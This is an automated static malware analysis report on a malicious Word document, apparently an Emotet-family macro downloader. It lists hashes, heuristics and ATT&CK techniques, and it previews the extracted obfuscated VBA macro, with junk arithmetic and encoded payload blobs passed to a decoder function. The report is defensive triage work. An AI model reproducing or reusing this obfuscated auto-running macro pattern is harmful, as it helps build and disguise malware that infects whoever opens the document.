Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 03d74e6bedda0b76…

MALICIOUS

Office (OLE)

220.5 KB Created: 2018-04-03 12:03:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 83b805f0c8dfdff8523c670a9b0ce916 SHA-1: 05f7798f56737c8aa4f4163f4fc9ea60681fa9ee SHA-256: 03d74e6bedda0b76b981700ddefb3544da7d4e5100b6a45ed7e893cdb3dddf21
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and utilizes CreateObject to likely download and execute a second-stage payload, as indicated by the 'Doc.Malware.Emodldr' ClamAV detection and the presence of a VBA macro file named 'macros.bas'. The obfuscated nature of the script prevents a more detailed analysis of its specific actions.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36521 bytes
SHA-256: 521e31a4d2e2c5bcdc638211da66b01bd5cb13150d1304044594cabaf86ed403
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 15 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sLjZKKFDaVQdt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BWQkMshlQpJmV"
Function GiQjpjnQvYUVM()
On Error Resume Next
whlXUQ = 3123 * 38209
NHwKNC = (47085 + CDate(3430 / Atn(tAAUd)) / 73551 * cKYziK * 84511 * CInt(OJzdi) * qMqzZc / CSng(pZMGr))
OWsdE = Tan(99425)
pcqjvk = FlLNj("FFd3hYHquIm65XHCMe8f3G4ukZT0m84vmDnif6/bfxvBh3fN5aPQbg4izOtXTc31m+pdZjq3HhvFLjs/1qj3yQn9d8cn2u9Tmu77hfo7jEunSK99Lw2+tnzf1ifN8sPtH89D3dV/FSmp2", 4, 135)
sFdUIC = 29320 * 67198
DDuXhC = (76676 + CDate(19574 / Atn(DJTml)) / 22229 * qwcsVj * 90527 * CInt(lkkjVr) * NbtVJ / CSng(UiMii))
ApYFT = Tan(34275)
molVj = 86358 * 85473
vjSMC = (133 + CDate(58734 / Atn(FGhwmR)) / 18474 * trzaH * 43962 * CInt(nlOHGA) * ztHohs / CSng(okuZfR))
sTOViU = Tan(54502)
zzzOGciAc = FlLNj("cXG8mt0zmq+HvpXs89s3oFHBXnzxD4aUCfqluGoPNf9TFf2zNvqa32Z+m/h0D9pXqAu5BFxFPQ76leNc87mq/Ut8+X7LevVBfC3Jc8azv+kH6kv3QB8OuWt9Qv0ONYnI3/SHDg1HAP6M/GyC+g/61vkv0d9UH/UpUS9sW7PPsQz52ZLv9H5ND94joePMd1IujfG2XP6w2UP", 2, 197)
tRSYFf = 52706 * 77313
YhFHnr = (97279 + CDate(69853 / Atn(RFHFA)) / 53302 * auRzm * 52993 * CInt(XKApVJ) * TMwBBz / CSng(sFcQk))
DXhnQ = Tan(82327)
mXOwr = 60914 * 45207
GdHRR = (20018 + CDate(76934 / Atn(BpWVzb)) / 86835 * pYKppT * 50913 * CInt(iJJXF) * NCCKO / CSng(VjSNbF))
TXMRL = Tan(58015)
ztFwBS = FlLNj("SA71nwL0W/tkJ/C/mDX8Pw+8GV+AFft9Jvsb0VN68OZj8+O325lN593DRHH8s1//cbT5enF/XYTI57ieH+dnJySw7msS/k+Xm4Wbz8Lk5/319t/la3uivgIdHJ9/l/uPQnH/9cTI5nPz0b3k3v73ffDjfvN2clzfr8uThNm5Y3SwPj/7Mfsn/+vng8wMfTi", 3, 184)
GTVhj = 74972 * 5538
nIAQds = (54189 + CDate(38191 / Atn(nNzdJ)) / 11583 * OjRGAS * 85074 * CInt(tqCuhU) * btltKN / CSng(cJrDs))
whmzNY = Tan(38180)
QoFfh = 85623 * 76894
IXPUjq = (83683 + CDate(30918 / Atn(isJcH)) / 66641 * outfW * 12582 * CInt(RPAZZb) * MJNcZ / CSng(lIPlp))
YMHOnJ = Tan(10643)
lECOiOwt = FlLNj("fLaPYvJi5sL8V3lbyaWXvby9lfj8KGUv535+L8tBaplX8k7kyzBfyTun6071+ZOfv5eylA9eXsu7QTovmSx6cRK/X3ppvTzK0kknMpWFl0Zkpt/H57iujevnV7KspA3znf9A", 6, 125)
qnzIMC = 63859 * 96938
jQRoI = (34016 + CDate(67721 / Atn(AhUXji)) / 15193 * fhdJAN * 31267 * CInt(iQZKF) * XjmDf / CSng(XCQvY))
nbkYK = Tan(15990)
pTtlri = 70540 * 11233
YnRXI = (29206 + CDate(80669 / Atn(wGsdNI)) / 22712 * ncuZzI * 69324 * CInt(EUkES) * rUQYn / CSng(mNSqMY))
FuAbL = Tan(65368)
AiTJARo = FlLNj("ciwo5qRo4lyvwGfqcwzfqOSv0O/jBe8R43innPfxW6gP65pr+A/xYc25WnCvWb4/P/quHf8FcRH1Dmuu4V7l0nwhJb3F/MB+Z/Jb1J+sz0CeZP3ajr3zhDzmvwUfUqQc/k24u0xxqyTfzPfb7Rupf9F8gHtVYL/PzC/px6OGedw", 7, 163)
DCqjXP = 6762 * 32796
nilLl = (28660 + CDate(47891 / Atn(pUlCZ)) / 19210 * MbziG * 7953 * CInt(ZWVJpd) * AXWVui / CSng(bMZqV))
lqwuds = Tan(74864)
ukata = 42818 * 21002
KorOi = (69473 + CDate(90782 / Atn(ZLLkjz)) / 71119 * IBoVv * 26911 * CInt(QqwSK) * mTPOq / CSng(hwANsJ))
KfFlUw = Tan(99102)
JiaELNC = FlLNj("0DPbT/yc4p7ZedZ/XvG7Bk/HfaaoI/Hy0L9O8VxQz9DvPXm+R77Q23ge8Bmgx532ieqC8cFpXgX5s,1F2qB", 4, 74)
lZhpM = 93036 * 72126
XlRkam = (84559 + CDate(93314 / Atn(qVDXH)) / 76260 * LQDXLE * 54942 * CInt(LCBui) * djvXc / CSng(aZFYnI))
dbwhd = Tan(72022)
stJViI = 51550 * 77347
iiCwa = (7021 + CDate(92455 / Atn(KiqfcB)) / 55304 * kkOpi * 68391 * CInt(GHUkC) * bsjNl / CSng(izjaV))
njMvzQ = Tan(85541)
vXKoWbKH = FlLNj("On2po2Gc541AL8HzFvNv2VJ/bD5eATd9z/i0p07BLvc", 4, 36)
FzYLzv = 97711 * 19468
oGTtYi = (71796 + CDate(14067 / Atn(qutQB)) / 18135 * tqCLKJ * 8638 * CInt(WDdUXO) * HYDvUC / CSng(Pzboj))
zmowOT = Tan(11634)
WOKhMZ = 35392 * 415
jRnrj = (51411 + CDate(86366 / Atn(VLDPv)) / 90799 * nVzXiM * 67287 * CInt(jADPF) * dpwBTw / CSng(TfiFB))
Gjraa = Tan(36332)
ddDXwpuK = FlLNj("fioum5g7qA+Hn7XfCHqU1NnodN2HyqoJwV81ot5Cj+4Q77ww6n/0zw13mKOm/9u%", 6, 57)
trZuR = 83830 * 1875
GrcLnL = (83217 + CDate(42329 / Atn(NcwWU)) / 79801 * ShGcn * 80166 * CInt(dwnCm) * Bjbva / CSng(oCtNu))
NkMwU = Tan(90758)
JfcMdO = 87793 * 12448
DTaih = (19893 + CDate(863
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.